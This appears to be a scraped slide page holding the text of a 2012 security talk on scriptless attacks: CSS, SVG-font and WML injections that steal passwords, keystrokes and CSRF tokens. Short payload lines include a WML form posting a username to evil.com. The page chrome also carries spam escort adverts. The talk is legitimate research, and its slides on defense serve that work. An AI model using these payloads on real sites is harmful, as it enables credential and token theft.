Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 

Dernier (20)

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 

MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen Daten kommen

  • 1. (GOT YOUR NOSE) (How Attackers steal your precious Data without using Scripts) A Presentation by Mario Heiderich, 2012 (got your nose)
  • 2. (Our Dear Speaker)  Mario Heiderich  Researcher and PhD Student, Ruhr-Uni Bochum  PhD Thesis on Client Side Security and Defense  Security Researcher contracting for MS, Redmond  Security Researcher for SRLabs & Deutsche Post  Published author and international speaker  Specialized in HTML5 and SVG Security  JavaScript, XSS and Client Side Attacks  FUD Peddler and Prophet of Doom  HTML5 Security Cheatsheet (got your nose)
  • 3. (Background) (got your nose)
  • 4. (CrosS) (Site Scripting)  Lots of Talks have been held  Plenty of Research has been done  Traditional injections  Attacks from outer space  XSS, XAS, XDS, XSSQLI, SWXSS, … you name it!  Defense mechanisms on multiple layers  Network, Server, Client and what not...  CSP, NoScript, AntiSamy and HTMLPurifier, Browser XSS Filters  mod_security, PHPIDS, some nonsense WAF products  But why use scripting at all? (got your nose)
  • 5. (Topics TODAY)  Scriptless Attacks in your Browser  Attacks bypassing NoScript  Attacks bypassing Content Security Policy  No Scripting allowed  No Scripting necessary  Attacks working in Thunderbird  Attacks stealing your data without XSS (got your nose)
  • 6. (Offensive Talk)  We'll mainly see attack vectors today  Starting simple – using cheap HTTP tricks  Stealing passwords with CSS  Almost like the Sexy Assassin back in 2009  Just without any bruteforcing  Playing with a user's perception  Time and Measure, Log and Steal  Focus is stealing data by using the browser  Passwords, tokens, sensitive data is general (got your nose)
  • 7. (The ) (Markup Brothers) (SVG Sanchez) (HTML Harry) (Clive S Stylesheet) (got your nose)
  • 8. (A river for some) (got your nose)
  • 9. (Defense)  Defense is possible but tough  Benign features combined to be attacks  No possibility to easily build signatures  Attacker utilizes solicited content  CSS, SVG images, Links and Images  No scripting allowed!  „Thanks for the injection!“ (got your nose)
  • 10. (Happy Injections) (got your nose)
  • 11. (Exploits)  Three Chapters to be presented  Chapter 1: The simple tricks  Chapter 2: Advanced Class  Chapter 3: For Science! (got your nose)
  • 12. (Chapter one) < Those simple Tricks > (got your nose)
  • 13. (Alice and the captcha)  Let's asume the following situation  Alice visits a website she frequently uses  She has a login there, password stored  Let's further assume her password is „secret“  The site seems to have a new security feature!  Now the login needs a CAPTCHA to be solved  And that is how it looks like! (got your nose)
  • 14. (CAPCTHA Of doom)  Seems legit?  See it live: http://heideri.ch/opera/captcha/ (got your nose)
  • 15. (analysis)  What really happens  The attacker, Clive, injects CSS...  input[type=password]{content:attr(value)}  Then he includes a custom SVG font  @font-face {font-family: X;src: url(x.svg#X) format("svg");}  The attacker simply flips characters  s becomes x, e becomes w, c becomes @ …  By thinking it's a CAPTCHA...  … Alice submits her password to the attacker (got your nose)
  • 16. (validation) (got your nose)
  • 17. (css and regex)  Old but gold – brute-forcing passwords  But this time with CSS3 and HTML5  The secret ingredient here is „validation“  Brute-force with RegEx!  Let's have a look  DEMO  Good thing it works on all browsers  Limited by smart password managers though (got your nose)
  • 18. (Chapter TWO) < Advanced Class > (got your nose)
  • 19. (I read you)  Bob is security aware  His online banking webite? No scripts allowed!  His browser? Top-up-to-date!  His emails? PGP SMIME – you name it! ,  Bob isolates stuff, knows his security  Even if an attacker XSS'd his bank website...  Nothing could happen – no JavaScript, Flash or Java  How can we still pwn Bob then? (got your nose)
  • 20. (smart bob) (got your nose)
  • 21. (define goals)  We cannot XSS Bob  We cannot easily get his cookies  Neither simply access sensitive data  But we want his login data  So we oughta „jack“ the login form! (got your nose)
  • 22. (WAP Injection)  If Bob used Opera, we'd have a nice lever (got your nose)
  • 23. (Legit or not)  Looked legit – or did it?  So what happened here?  Opera allows WAP/WML injections  Thereby we can use WML variables  <go href="//evil.com"><postfield name="stolen" value="$(username)"/>  Limited though – XHTML only, Opera only  Let's have a look: http://html5sec.org/login (got your nose)
  • 24. (Lucky bob)  He uses Firefox with NoScript  ...and Thunderbird with Enigmail  Unpwnable? (got your nose)
  • 25. Rebuttal  Let's stay admantine  And develop a targeted exploit  Working on Firefox and Thunderbird  Latest versions, bypassing NoScript How can we do that?  And can we do it at all?  Let's have a look! (got your nose)
  • 26. (keylogger)  Just a harmless login page  Behaving strange on closer inspection though...  Let's check that http://html5sec.org/keylogger (got your nose)
  • 27. (Leaving las vegas)  If it works in Firefox w/o JavaScript  Can it also work in... (got your nose)
  • 28. (thunderbird)  Mother of God!  Stealing and exfiltrating keystrokes  Right in your favorite email client  Demo time! (got your nose)
  • 29. (How is it done)  Attacker injected some inline SVG code  SVG knows the <set> element  The <set> element can listen to events  Even keystrokes  The feature is called accessKey() (W3C)  JavaScript is turned off – it's „no script“ anyway  But the keystroke scope is hard to define  In Firefox it's the whole document (got your nose)
  • 30. (thanks svg sanchez) Now, what's next? (got your nose)
  • 31. <lets take a breath> (got your nose)
  • 32. (Chapter three) < For Science!!! > (got your nose)
  • 33. (CSRF Tokens)  Everybody knows CSRF  One domain makes a request to another  The user is logged into that other domain  Stuff happens, accounts get modified etc.  How to we kill CSRF?  Easily – we use tokens, nonces  We make sure a request cannot be guessed  Or brute-forced – good tokens are long and safe (got your nose)
  • 34. CSRF and XSS  CSRF and XSS are good friends  JavaScript can read tokens from the DOM  Bypass most CSRF protection techniques  But can we steal CSRF tokens w/o JS? (got your nose)
  • 35. (Already done)  SDC, Gaz and thornmaker already did it  Check out http://p42.us/css/  They used CSS  Basically a brute-force via attribute selectors  input[value^=a]{background:url(?a)}  If the server catches GET /?a...  The first character is an a  But then what?  There's no „second or Nth character selector“  They had to go input[value^=aa]{background:url(?aa)} (got your nose)
  • 36. (effectiveness)  We're attackers who don't have much time!  So we cannot bruteforce like that  We need a quicker approach!  Also, this time we want to attack Webkit :-)  Let's cook ourselves some crazy CSS! (got your nose)
  • 37. (ingredients)  Some links with a secret CSRF token  A CSS injection  height  width  content:attr(href)  overflow-x:none  font-family  And another secret ingredient (got your nose)
  • 38. (DEMO)  http://html5sec.org/webkit/test (got your nose)
  • 39. (cooking meth)  The secret ingredients  Custom SVG font – one per character  An animation – decreasing the box size  The overflow to control scrollbar appearance  And finally...  Styled scrollbar elements – Webkit only div.s::-webkit-scrollbar-track-piece :vertical:increment {background:red url(/s)} (got your nose)
  • 40. (those fonts)  There's more we can do with custom fonts  HTML5 recommends WOFF  All done via @font-face  WOFF supports an interesting feature  Discretionary Ligatures  Arbitrary character sequences can become one character  Imagine.. C a t become a cat icon. Or... d e e r a lil' deer (got your nose)
  • 41. (ligatures)  http://ie.microsoft.com/testdrive/graphics/opentype/opentype-monotype/index.html (got your nose)
  • 42. (fontforge) (got your nose)
  • 43. (Attack fonts)  We can thus build dictionary fonts!  One character per password for example  No problem for a font to handle 100k+ items  Map the string s u p e r s e c r e t into one char  Make everything else invisible  If the character is visible, we have a hit  If not the password is not in the list/font  But how to activate this ligature feature?  With CSS3! -moz-font-feature-settings:'calt=0'; -ms-font-feature- settings:'calt' 0;  How can we find out if nothing – or just one char is visible? (got your nose)
  • 44. (go CSS)  Remember the smart scrollbars?  Same thing all over again  But this time for all browsers please  CSS Media Queries to the rescue!  We can deploy selective CSS depending on:  Viewport width, viewport height  @media screen and (max-width: 400px){*{foo:bar}}  Every character gets a distinct width, and/or height  Once scrollbars appear, the viewport width gets reduced  By the width of the scrollbar  Some Iframe tricks do the job and allow universal scrollbar detection  That's all we need _:D (got your nose)
  • 45. {Demo} DEMO (got your nose)
  • 46. (the perfect leak) (got your nose)
  • 47. {Almost done} (got your nose)
  • 48. (CONCLUSION I) Everything is a side-channel nowadays (Oh my!) (got your nose)
  • 49. (Conclusion II)  Scriptless Attacks versus XSS  Not many differences in impact  More common injcetion scenarios  Affecting sandboxes with HTML5  Information leaks by design  Hard to detect and fix  Timing and Side-Channel  NoScript to the rescue! (got your nose)
  • 50. (defense)  How to protect against features?  How to protect against side-channels  Reduce data leakage?  Change standards?  Build better sandboxes?  Extend SOP to images and other side channels,  Use CSP?  XFO and Framebusters ftw?  Use NoScript if you can! (got your nose)
  • 51. (Future work)  There's a lot more in this  CSRF, injections and side-channels  Challenging attacker creativity  Application and App specific bugs  Scriptless attacks and mobile devices?  Exciting times to come without XSS (got your nose)
  • 52. (The end)  Questions?  Discussion?  Beer? (got your nose)